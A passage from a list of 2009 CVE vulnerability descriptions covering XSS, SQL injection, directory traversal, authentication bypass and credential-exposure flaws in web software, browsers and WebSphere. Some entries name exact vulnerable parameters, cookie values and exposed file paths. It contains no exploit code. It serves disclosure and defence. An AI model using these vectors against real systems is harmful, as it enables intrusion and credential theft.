vulnerability in people.php in Zoph before 0.7.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information. [CVE-2009-2342] Cross-site scripting (XSS) vulnerability in admin.php (aka the login page) in Content Management Made Easy (CMME) before 1.22 allows remote attackers to inject arbitrary web script or HTML via the username field. [CVE-2009-2338] Directory traversal vulnerability in includes/startmodules.inc.php in FreeWebshop.org 2.2.9 R2, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang_file parameter. [CVE-2009-2336] The forgotten mail interface in WordPress and WordPress MU before 2.8.1 exhibits different behavior for a password request depending on whether the user account exists, which allows remote attackers to enumerate valid usernames. NOTE: the vendor reportedly disputes the significance of this issue, indicating that the behavior exists for "user convenience." [CVE-2009-2330] Cross-site scripting (XSS) vulnerability in admin/admin_menu.php in CMS Chainuk 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the menu parameter. [CVE-2009-2327] Cross-site scripting (XSS) vulnerability in add_voting.php in KerviNet Forum 1.1 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the v_variant1 parameter. [CVE-2009-2324] Multiple cross-site scripting (XSS) vulnerabilities in FCKeditor before 2.6.4.1 allow remote attackers to inject arbitrary web script or HTML via components in the samples (aka _samples) directory. [CVE-2009-2322] Cross-site scripting (XSS) vulnerability in cgi-bin/sysconf.cgi on the Axesstel MV 410R allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2312] SmartFilter Web Gateway Security 4.2.1.00 stores user credentials in cleartext in config.txt and uses insecure permissions for this file, which allows local users to gain privileges. [CVE-2009-2306] The ARD-9808 DVR card security camera stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing usernames and passwords via a direct request for dvr.ini. [CVE-2009-2302] Cross-site scripting (XSS) vulnerability in index.php in Aardvark Topsites PHP 5.2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action. NOTE: it was later reported that 5.2.1 is also affected. [CVE-2009-2301] The radware AppWall Web Application Firewall (WAF) 1.0.2.6, with Gateway 4.6.0.2, allows remote attackers to read source code via a direct request to (1) funcs.inc, (2) defines.inc, or (3) msg.inc in Management/. [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data. [CVE-2009-2298] Stack-based buffer overflow in rping in HP OpenView Network Node Manager (OV NNM) 7.53 on Linux allows remote attackers to execute arbitrary code via unspecified vectors, possibly involving a CGI request to webappmon.exe. NOTE: this may overlap CVE-2009-1420. [CVE-2009-2293] Optimum Web Design Tutorial Share 3.5.0 and earlier allows remote attackers to bypass authentication and obtain administrative access by setting the usernamed cookie parameter. [CVE-2009-2292] Cross-site scripting (XSS) vulnerability in Appleple a-News 2.32 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2289] Cross-site scripting (XSS) vulnerability in index.php in Arcade Trade Script 1.0 beta allows remote attackers to inject arbitrary web script or HTML via the q parameter in a gamelist action. [CVE-2009-2284] Cross-site scripting (XSS) vulnerability in phpMyAdmin before 3.2.0.1 allows remote attackers to inject arbitrary web script or HTML via a crafted SQL bookmark. [CVE-2009-2283] Multiple cross-site scripting (XSS) vulnerabilities in the help jsp scripts in Sun Java Web Console 3.0.2 through 3.0.5, and Sun Java Web Console in Solaris 10, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2277] Cross-site scripting (XSS) vulnerability in WebAccess in VMware VirtualCenter 2.0.2 and 2.5 and VMware ESX 3.0.3 and 3.5 allows remote attackers to inject arbitrary web script or HTML via vectors related to "context data." [CVE-2009-2268] Cross-site scripting (XSS) vulnerability in the Cross-Domain Controller (CDC) servlet in Sun Java System Access Manager 6 2005Q1, 7 2005Q4, and 7.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2241] Cross-site scripting (XSS) vulnerability in search.asp in ASP Inline Corporate Calendar allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. [CVE-2009-2240] Cross-site scripting (XSS) vulnerability in AD2000 free-sw leger (aka Web Conference Room Free) 1.6.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2238] Unrestricted file upload vulnerability in includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp in DMXReady Registration Manager 1.1 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in assets/webblogmanager. [CVE-2009-2233] The admin interface in AWScripts.com Gallery Search Engine 1.5 allows remote attackers to bypass authentication and gain administrative access by setting the awse_logged cookie to 1. [CVE-2009-2228] Cross-site scripting (XSS) vulnerability in engine.php in Kasseler CMS allows remote attackers to inject arbitrary web script or HTML via the url parameter in a redirect action. [CVE-2009-2226] Cross-site scripting (XSS) vulnerability in Let's PHP! Tree BBS 2004/11/23 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2221] Cross-site scripting (XSS) vulnerability in PHP-I-BOARD 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2219] Multiple cross-site scripting (XSS) vulnerabilities in phpCollegeExchange 0.1.5c allow remote attackers to inject arbitrary web script or HTML via the (1) _SESSION[handle] parameter to (a) home.php, (b) books/allbooks.php, or (c) books/home.php [CVE-2009-2217] Cross-site scripting (XSS) vulnerability in NBBC before 1.4.2 allows remote attackers to inject arbitrary web script or HTML via an invalid URL in a BBCode img tag. [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request. [CVE-2009-2215] Multiple cross-site scripting (XSS) vulnerabilities in URD before 0.6.2 allow remote attackers to inject arbitrary web script or HTML via vectors related to the fatal_error page and unspecified other components. [CVE-2009-2212] The CQWeb server in IBM Rational ClearQuest 7.0.0 before 7.0.0.6 and 7.0.1 before 7.0.1.5 allows attackers to discover a (1) username or (2) password via unspecified vectors. [CVE-2009-2211] Cross-site scripting (XSS) vulnerability in the CQWeb server in IBM Rational ClearQuest 7.0.0 before 7.0.0.6 and 7.0.1 before 7.0.1.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2208] FreeBSD 6.3, 6.4, 7.1, and 7.2 does not enforce permissions on the SIOCSIFINFO_IN6 IOCTL, which allows local users to modify or disable IPv6 network interfaces, as demonstrated by modifying the MTU. [CVE-2009-2205] Stack-based buffer overflow in the Java Web Start command launcher in Java for Mac OS X 10.5 before Update 5 allows attackers to execute arbitrary code or cause a denial of service (application crash) via unspecified vectors. [CVE-2009-2200] WebKit in Apple Safari before 4.0.3 does not properly restrict the URL scheme of the pluginspage attribute of an EMBED element, which allows user-assisted remote attackers to launch arbitrary file: URLs and obtain sensitive information via a crafted HTML document. [CVE-2009-2199] Incomplete blacklist vulnerability in WebKit in Apple Safari before 4.0.3, as used on iPhone OS before 3.1, iPhone OS before 3.1.1 for iPod touch, and other platforms, allows remote attackers to spoof domain names in URLs, and possibly conduct phishing attacks, via unspecified homoglyphs. [CVE-2009-2198] Apple GarageBand before 5.1 reconfigures Safari to accept all cookies regardless of domain name, which makes it easier for remote web servers to track users. [CVE-2009-2196] Unspecified vulnerability in Apple Safari 4 before 4.0.3 allows remote web servers to place an arbitrary web site in the Top Sites view, and possibly conduct phishing attacks, via unknown vectors. [CVE-2009-2195] Buffer overflow in WebKit in Apple Safari before 4.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted floating-point numbers. [CVE-2009-2181] Cross-site scripting (XSS) vulnerability in admin-files/templates/list_dir.php in Campsite 3.3.0 RC1 allows remote attackers to inject arbitrary web script or HTML via the listbasedir parameter. [CVE-2009-2178] Cross-site scripting (XSS) vulnerability in website.php in phpDatingClub 3.7 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2009-2172] Cross-site scripting (XSS) vulnerability in forum/radioandtv.php in the Radio and TV Player addon for vBulletin allows remote registered users to inject arbitrary web script or HTML via the station parameter. [CVE-2009-2170] Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.0 before 1.0.12 and 1.1 before 1.1.5 allow remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2009-2168] cpanel/login.php in EgyPlus 7ammel (aka 7ml) 1.0.1 and earlier sends a redirect to the web browser but does not exit when the supplied credentials are incorrect, which allows remote attackers to bypass authentication by providing arbitrary username and password parameters. [CVE-2009-2163] Cross-site scripting (XSS) vulnerability in login/default.aspx in Sitecore CMS before 6.0.2 Update-1 090507 allows remote attackers to inject arbitrary web script or HTML via the sc_error parameter. [CVE-2009-2162] Cross-site scripting (XSS) vulnerability in the XOOPS MANIAC PukiWikiMod module 1.6.6.2 and earlier for XOOPS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2161] Directory traversal vulnerability in backend/admin-functions.php in TorrentTrader Classic 1.09, when used on a case-insensitive web site, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the ss_uri parameter, in conjunction with a modified component name. [CVE-2009-2156] Multiple cross-site scripting (XSS) vulnerabilities in TorrentTrader Classic 1.09 allow remote authenticated users to inject arbitrary web script or HTML via (1) the Title field to requests.php, related to viewrequests.php [CVE-2009-2155] Cross-site scripting (XSS) vulnerability in report/ReportViewAction.do in WebNMS Free Edition 5 allows remote attackers to inject arbitrary web script or HTML via the type parameter. NOTE: the provenance of this information is unknown [CVE-2009-2153] Cross-site scripting (XSS) vulnerability in index.php in Impleo Music Collection 2.0 allows remote attackers to inject arbitrary web script or HTML via the sort parameter. [CVE-2009-2152] SQL injection vulnerability in a_index.php in AdaptWeb 0.9.2 allows remote attackers to execute arbitrary SQL commands via the CodigoDisciplina parameter in a TopicosCadastro1 action. [CVE-2009-2151] Directory traversal vulnerability in index.php in AdaptWeb 0.9.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the newlang parameter. [CVE-2009-2149] Multiple cross-site scripting (XSS) vulnerabilities in Campus Virtual-LMS allow remote attackers to inject arbitrary web script or HTML via the (1) courseid parameter to enrolments/step1.php, or the (2) search or (3) siteid parameter to files/shared_list.php. [CVE-2009-2147] SQL injection vulnerability in fdown.php in phpWebThings 1.5.2 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2009-2145] Multiple cross-site scripting (XSS) vulnerabilities in transLucid 1.75 allow remote attackers to inject arbitrary web script or HTML via the (a) NodeID and (b) action parameters to the default URI, and the (c) NodeID parameter to the default URI for the admin section [CVE-2009-2141] Multiple cross-site scripting (XSS) vulnerabilities in TBDev.NET 01-01-08 allow remote attackers to inject arbitrary web script or HTML via (1) the returnto parameter to makepoll.php, (2) the returnto parameter in a delete action to polls.php, or the (3) Info or (4) Avatar field to my.php. [CVE-2009-2138] Multiple open redirect vulnerabilities in TBDev.NET 01-01-08 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via (1) the returnto parameter to login.php or (2) the returnto parameter in a delete action to news.php. NOTE: this can be leveraged for cross-site scripting (XSS) by redirecting to a data: URI. [CVE-2009-2136] Unspecified vulnerability in the TCP/IP networking stack in Sun Solaris 10, and OpenSolaris snv_01 through snv_82 and snv_111 through snv_117, when a Cassini GigaSwift Ethernet Adapter (aka CE) interface is used, allows remote attackers to cause a denial of service (panic) via vectors involving jumbo frames. [CVE-2009-2133] Multiple cross-site scripting (XSS) vulnerabilities in Pivot 1.40.4 and 1.40.7 allow remote attackers to inject arbitrary web script or HTML via the (1) menu or (2) sort parameter to pivot/index.php, (3) the value of a check array parameter in a delete action to pivot/index.php, (4) the element name in a check array parameter in a delete action to pivot/index.php, (5) the edituser parameter in an edituser action to pivot/index.php, (6) the edit parameter in a templates action to pivot/index.php, (7) the blog parameter in a blog_edit1 action to pivot/index.php, (8) the cat parameter in a cat_edit action to pivot/index.php, (9) a certain form field in a doaction=1 request to pivot/index.php, (10) the url field in a my_weblog edit_prefs action to pivot/user.php, or (11) the username (aka name) field in a my_weblog reg_user action to pivot/user.php. [CVE-2009-2131] Cross-site scripting (XSS) vulnerability in 4images 1.7.7 and earlier allows remote authenticated users to inject arbitrary web script or HTML by providing a crafted user_homepage parameter to member.php, and then posting a comment associated with a picture. [CVE-2009-2127] Cross-site scripting (XSS) vulnerability in show_activity.php in Elvin 1.2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2009-2126] Cross-site scripting (XSS) vulnerability in close_bug.php in Elvin before 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the title (aka subject) field. [CVE-2009-2114] Multiple cross-site scripting (XSS) vulnerabilities in admin.php in SkyBlueCanvas 1.1 r237 allow remote attackers to inject arbitrary web script or HTML via the (1) mgroup, (2) mgr, (3) objtype, (4) id, and (5) dir parameters. [CVE-2009-2113] Multiple SQL injection vulnerabilities in FretsWeb 1.2 allow remote attackers to execute arbitrary SQL commands via the (1) name parameter to player.php and the (2) hash parameter to song.php. [CVE-2009-2109] Multiple directory traversal vulnerabilities in FretsWeb 1.2 allow remote attackers to read arbitrary files via directory traversal sequences in the (1) language parameter to charts.php and the (2) fretsweb_language cookie parameter to unspecified vectors, possibly related to admin/common.php. [CVE-2009-2107] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Webmedia Explorer (webmex) 5.09 and 5.10 allow remote attackers to inject arbitrary web script or HTML via event handlers such as onmouseover in the (1) search or (2) tag parameters [CVE-2009-2104] Cross-site scripting (XSS) vulnerability in the Modern Guestbook / Commenting System (ve_guestbook) extension 2.7.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2094] Unspecified vulnerability in IBM WebSphere Commerce 6.0 Enterprise before 6.0.0.8, when trace is enabled, allows local users to obtain sensitive information via unknown vectors. [CVE-2009-2093] SQL injection vulnerability in the console in IBM WebSphere Partner Gateway (WPG) Enterprise 6.0 before FP8, 6.1 before FP3, 6.1.1 before FP2, and 6.2 before FP1 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. [CVE-2009-2092] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.5 does not properly read the portletServingEnabled parameter in ibm-portlet-ext.xmi, which allows remote attackers to bypass intended access restrictions via unknown vectors. [CVE-2009-2091] The System Management/Repository component in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.5 on z/OS uses weak file permissions for new applications, which allows remote attackers to obtain sensitive information via unspecified vectors. [CVE-2009-2090] Unspecified vulnerability in wsadmin in the System Management/Repository component in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.5 allows remote attackers to bypass intended Java Management Extensions (JMX) Management Beans (aka MBeans) access restrictions, and cause a denial of service (daemon stop), via unknown vectors. [CVE-2009-2089] The Migration component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.25 and 7.0 before 7.0.0.5, when tracing is enabled and a 6.1 to 7.0 migration has occurred, allows remote authenticated users to obtain sensitive information by reading a Migration Trace file. [CVE-2009-2088] The Servlet Engine/Web Container component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.25 and 7.0 before 7.0.0.5, when SPNEGO Single Sign-on (SSO) and disableSecurityPreInvokeOnFilters are configured, allows remote attackers to bypass authentication via a request for a "secure URL," related to a certain invokefilterscompatibility property. [CVE-2009-2087] The Web Services functionality in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.25 and 7.0 before 7.0.0.5, in certain circumstances involving the ibm-webservicesclient-bind.xmi file and custom password encryption, uses weak password obfuscation, which allows local users to cause a denial of service (deployment failure) via unspecified vectors. [CVE-2009-2085] The Security component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.25 and 7.0 before 7.0.0.5 does not properly handle use of Identity Assertion with CSIv2 Security, which allows remote attackers to bypass intended CSIv2 access restrictions via vectors involving Enterprise JavaBeans (EJB). [CVE-2009-2083] Cross-site scripting (XSS) vulnerability in the term data detail page in Taxonomy manager 5.x before 5.x-1.2, a module for Drupal, allows remote authenticated users, with administer taxonomy privileges or the ability to use free tagging to add taxonomy terms, to inject arbitrary web script or HTML via "Parent and related terms." [CVE-2009-2082] SQL injection vulnerability in insidepage.php in Creative Web Solutions Multi-Level CMS 1.21 allows remote attackers to execute arbitrary SQL commands via the catid parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-2081] Directory traversal vulnerability in help.php in phpWebThings 1.5.2 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the module parameter. [CVE-2009-2078] Multiple cross-site scripting (XSS) vulnerabilities in Booktree 5.x before 5.x-7.3 and 6.x before 6.x-1.1, a module for Drupal, allow remote attackers to inject arbitrary web script or HTML via the (1) node title and (2) node body in a tree root page. [CVE-2009-2074] Cross-site scripting (XSS) vulnerability in Nodequeue 5.x before 5.x-2.7 and 6.x before 6.x-2.2, a module for Drupal, allows remote authenticated users with administer taxonomy permissions to inject arbitrary web script or HTML via vocabulary names. [CVE-2009-2072] Apple Safari does not require a cached certificate before displaying a lock icon for an https web site, which allows man-in-the-middle attackers to spoof an arbitrary https site by sending the browser a crafted (1) 4xx or (2) 5xx CONNECT response page for an https request sent through a proxy server. [CVE-2009-2068] Google Chrome detects http content in https web pages only when the top-level frame uses https, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying an http page to include an https iframe that references a script file on an http site, related to "HTTP-Intended-but-HTTPS-Loadable (HPIHSL) pages." [CVE-2009-2067] Opera detects http content in https web pages only when the top-level frame uses https, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying an http page to include an https iframe that references a script file on an http site, related to "HTTP-Intended-but-HTTPS-Loadable (HPIHSL) pages." [CVE-2009-2066] Apple Safari detects http content in https web pages only when the top-level frame uses https, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying an http page to include an https iframe that references a script file on an http site, related to "HTTP-Intended-but-HTTPS-Loadable (HPIHSL) pages." [CVE-2009-2065] Mozilla Firefox 3.0.10, and possibly other versions, detects http content in https web pages only when the top-level frame uses https, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying an http page to include an https iframe that references a script file on an http site, related to "HTTP-Intended-but-HTTPS-Loadable (HPIHSL) pages." [CVE-2009-2064] Microsoft Internet Explorer 8, and possibly other versions, detects http content in https web pages only when the top-level frame uses https, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying an http page to include an https iframe that references a script file on an http site, related to "HTTP-Intended-but-HTTPS-Loadable (HPIHSL) pages." [CVE-2009-2063] Opera, possibly before 9.25, processes a 3xx HTTP CONNECT response before a successful SSL handshake, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying this CONNECT response to specify a 302 redirect to an arbitrary https web site. [CVE-2009-2062] Apple Safari before 3.2.2 processes a 3xx HTTP CONNECT response before a successful SSL handshake, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying this CONNECT response to specify a 302 redirect to an arbitrary https web site. [CVE-2009-2061] Mozilla Firefox before 3.0.10 processes a 3xx HTTP CONNECT response before a successful SSL handshake, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying this CONNECT response to specify a 302 redirect to an arbitrary https web site. [CVE-2009-2060] src/net/http/http_transaction_winhttp.cc in Google Chrome before 1.0.154.53 uses the HTTP Host header to determine the context of a document provided in a (1) 4xx or (2) 5xx CONNECT response from a proxy server, which allows man-in-the-middle attackers to execute arbitrary web script by modifying this CONNECT response, aka an "SSL tampering" attack. [CVE-2009-2059] Opera, possibly before 9.25, uses the HTTP Host header to determine the context of a document provided in a (1) 4xx or (2) 5xx CONNECT response from a proxy server, which allows man-in-the-middle attackers to execute arbitrary web script by modifying this CONNECT response, aka an "SSL tampering" attack. [CVE-2009-2058] Apple Safari before 3.2.2 uses the HTTP Host header to determine the context of a document provided in a (1) 4xx or (2) 5xx CONNECT response from a proxy server, which allows man-in-the-middle attackers to execute arbitrary web script by modifying this CONNECT response, aka an "SSL tampering" attack. [CVE-2009-2057] Microsoft Internet Explorer before 8 uses the HTTP Host header to determine the context of a document provided in a (1) 4xx or (2) 5xx CONNECT response from a proxy server, which allows man-in-the-middle attackers to execute arbitrary web script by modifying this CONNECT response, aka an "SSL tampering" attack. [CVE-2009-2047] Directory traversal vulnerability in the Administration interface in Cisco Customer Response Solutions (CRS) before 7.0(1) SR2 in Cisco Unified Contact Center Express (aka CCX) server allows remote authenticated users to read, modify, or delete arbitrary files via unspecified vectors. [CVE-2009-2046] The embedded web server on the Cisco Video Surveillance 2500 Series IP Camera with firmware before 2.1 allows remote attackers to read arbitrary files via a (1) http or (2) https request, related to the (a) SD Camera Web Server and the (b) Wireless Camera HTTP Server, aka Bug IDs CSCsu05515 and CSCsr96497. [CVE-2009-2041] Cross-site scripting (XSS) vulnerability in A51 D.O.O. activeCollab 0.7.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2009-1772. [CVE-2009-2033] Cross-site scripting (XSS) vulnerability in index.php in Yogurt 0.3 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2009-2032] Cross-site scripting (XSS) vulnerability in search.asp in PDshopPro, when downloaded before 20070308, allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2009-2024] Vlad Titarenko ASP VT Auth 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file and obtain usernames and passwords via a direct request for zHk8dEes3.txt. [CVE-2009-2022] fipsCMS Light 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file and obtain sensitive information via a direct request for _fipsdb/db.mdb. [CVE-2009-2020] Cross-site scripting (XSS) vulnerability in news_detail.php in Virtue News Manager allows remote attackers to inject arbitrary web script or HTML via the nid parameter. [CVE-2009-2009] Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.5, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) curdirpath parameter to main/document/slideshow.php and the (2) file parameter to main/exercice/testheaderpage.php. [CVE-2009-2006] Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.5, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) search_term parameter to main/auth/courses.php [CVE-2009-2002] Unspecified vulnerability in the WebLogic Portal component in BEA Product Suite 8.1.6, 9.2.3, 10.0.1, 10.2.1, and 10.3.1.0.0 allows remote attackers to affect integrity via unknown vectors. [CVE-2009-1975] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3 allows remote attackers to affect confidentiality, integrity, and availability, related to the WLS Console Package. [CVE-2009-1974] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to the Servlet Container Package. [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564. [CVE-2009-1953] IBM FileNet Content Manager 4.0, 4.0.1, and 4.5, as used in IBM WebSphere Application Server (WAS) and Oracle BEA WebLogic Application Server, when the CE Web Services listener has a certain WSEAF configuration, does not properly restrict use of a cached Subject, which allows remote attackers to obtain access with the credentials of a recently authenticated user via unspecified vectors. [CVE-2009-1951] Cross-site scripting (XSS) vulnerability in index.php in PropertyMax Pro FREE 0.3 allows remote attackers to inject arbitrary web script or HTML via the pl parameter in a mi action. [CVE-2009-1950] SQL injection vulnerability in yorum.asp in WebEyes Guest Book 3 allows remote attackers to execute arbitrary SQL commands via the mesajid parameter. [CVE-2009-1945] SQL injection vulnerability in webCal3_detail.asp in WebCal 3.04 allows remote attackers to execute arbitrary SQL commands via the event_id parameter. [CVE-2009-1942] Cross-site scripting (XSS) vulnerability in the Quiz module 5.x, 6.x-2.x before 6.x-2.2, and 6.x-3.x before 6.x-3.0, a module for Drupal, allows remote authenticated users, with create quizzes or quiz questions access, to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-1941] PAD Site Scripts 3.6 stores sensitive information under the web document root with insufficient access control, which allows remote attackers to download the database and obtain sensitive information via a direct request for dbbackup.txt. [CVE-2009-1940] Cross-site scripting (XSS) vulnerability in the administrator panel in the com_users core component for Joomla! 1.5.x through 1.5.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-1939] Cross-site scripting (XSS) vulnerability in the JA_Purity template for Joomla! 1.5.x through 1.5.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-1938] Cross-site scripting (XSS) vulnerability in Joomla! 1.5.x through 1.5.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to database output and the frontend administrative panel. [CVE-2009-1937] Cross-site scripting (XSS) vulnerability in the comment posting feature in LightNEasy 2.2.1 "no database" (aka flat) and 2.2.2 SQLite allows remote attackers to inject arbitrary web script or HTML via the (1) commentname (aka Author), (2) commentemail (aka Email), and (3) commentmessage (aka Comment) parameters. NOTE: some of these details are obtained from third party information. [CVE-2009-1934] Cross-site scripting (XSS) vulnerability in the Reverse Proxy Plug-in in Sun Java System Web Server 6.1 before SP11 allows remote attackers to inject arbitrary web script or HTML via the query string in situations that result in a 502 Gateway error. [CVE-2009-1920] The JScript scripting engine 5.1, 5.6, 5.7, and 5.8 in JScript.dll in Microsoft Windows, as used in Internet Explorer, does not properly load decoded scripts into memory before execution, which allows remote attackers to execute arbitrary code via a crafted web site that triggers memory corruption, aka "JScript Remote Code Execution Vulnerability." [CVE-2009-1912] Directory traversal vulnerability in src/func/language.php in webSPELL 4.2.0e and earlier allows remote attackers to include and execute arbitrary local .php files via a .. (dot dot) in a language cookie. NOTE: this can be leveraged for SQL injection by including awards.php. [CVE-2009-1911] Directory traversal vulnerability in .include/init.php (aka admin/_include/init.php) in QuiXplorer 2.3.2 and earlier, as used in TinyWebGallery (TWG) 1.7.6 and earlier, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang parameter to admin/index.php. [CVE-2009-1910] SQL injection vulnerability in index.php in RTWebalbum 1.0.462 allows remote attackers to execute arbitrary SQL commands via the AlbumId parameter. [CVE-2009-1908] Cross-site scripting (XSS) vulnerability in Skip 1.0.2 and earlier, and 1.1RC2 and earlier 1.1RC versions, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-1907] Cross-site scripting (XSS) vulnerability in claroline/linker/notfound.php in Claroline 1.8.11 allows remote attackers to inject arbitrary web script or HTML via the Referer HTTP header. [CVE-2009-1901] The Security component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 permits "non-standard http methods," which has unknown impact and remote attack vectors. [CVE-2009-1900] The Configservice APIs in the Administrative Console component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35, 6.1 before 6.1.0.25, and 7.0 before 7.0.0.5, when tracing is enabled, allow remote attackers to obtain sensitive information via unspecified use of the wsadmin scripting tool. [CVE-2009-1899] Unspecified vulnerability in the Administrative Configservice API in the System Management/Repository component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35, 6.1 before 6.1.0.25, and 7.0 before 7.0.0.5 on z/OS allows remote authenticated users to obtain sensitive information via unknown use of the wsadmin scripting tool, related to a "security exposure in wsadmin." [CVE-2009-1898] The secure login page in the Administrative Console component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 does not redirect to an https page upon receiving an http request, which makes it easier for remote attackers to read the contents of WAS sessions by sniffing the network. [CVE-2009-1896] The Java Web Start framework in IcedTea in OpenJDK before 1.6.0.0-20.b16.fc10 on Fedora 10, and before 1.6.0.0-27.b16.fc11 on Fedora 11, trusts an entire application when at least one of the listed jar files is trusted, which allows context-dependent attackers to execute arbitrary code without the untrusted-code restrictions via a crafted application, related to NetX. [CVE-2009-1889] The OSCAR protocol implementation in Pidgin before 2.5.8 misinterprets the ICQWebMessage message type as the ICQSMS message type, which allows remote attackers to cause a denial of service (application crash) via a crafted ICQ web message that triggers allocation of a large amount of memory. [CVE-2009-1881] Cross-site scripting (XSS) vulnerability in MT312 IMG-BBS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to model.php with a timestamp before 20090521. [CVE-2009-1880] Cross-site scripting (XSS) vulnerability in MT312 REP-BBS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) model.php and (2) config.php with timestamps before 20090521. [CVE-2009-1879] Cross-site scripting (XSS) vulnerability in index.template.html in the express-install templates in the SDK in Adobe Flex before 3.4, when the installed Flash version is older than a specified requiredMajorVersion value, allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2009-1878] Session fixation vulnerability in Adobe ColdFusion 8.0.1 and earlier allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2009-1877] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion 8.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2009-1875. [CVE-2009-1875] Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion 8.0.1 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2009-1877. [CVE-2009-1874] Multiple cross-site scripting (XSS) vulnerabilities in the Management Console in Adobe JRun 4.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-1872] Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to 